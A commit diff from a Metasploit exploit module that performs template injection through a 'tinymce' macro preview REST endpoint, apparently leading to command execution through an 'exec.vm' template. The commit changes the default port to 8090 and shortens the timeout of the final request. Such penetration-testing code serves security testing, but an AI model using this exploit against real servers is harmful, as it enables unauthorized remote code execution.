Updated RPORT to 8090, reduced timeout of final exec.vm request to 5 sec
parent
8b61c5edf5
commit
0aaae062a4
|
@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'RPORT' => 80,
|
||||
'RPORT' => 8090,
|
||||
'SRVPORT' => 8021,
|
||||
},
|
||||
'Privileged' => false,
|
||||
|
@ -197,10 +197,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
#
|
||||
# @param service_url [String] Address of template to injection.
|
||||
# @return [void]
|
||||
def inject_template(service_url)
|
||||
def inject_template(service_url, timeout=20)
|
||||
|
||||
uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')
|
||||
|
||||
if service_url.include?("exec.vm")
|
||||
timeout=5
|
||||
end
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => uri,
|
||||
|
@ -221,11 +225,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
}
|
||||
}.to_json
|
||||
})
|
||||
}, timeout=timeout)
|
||||
|
||||
unless res
|
||||
unless service_url.include?("exec.vm")
|
||||
print_warning('Connection timed out in #inject_template')
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue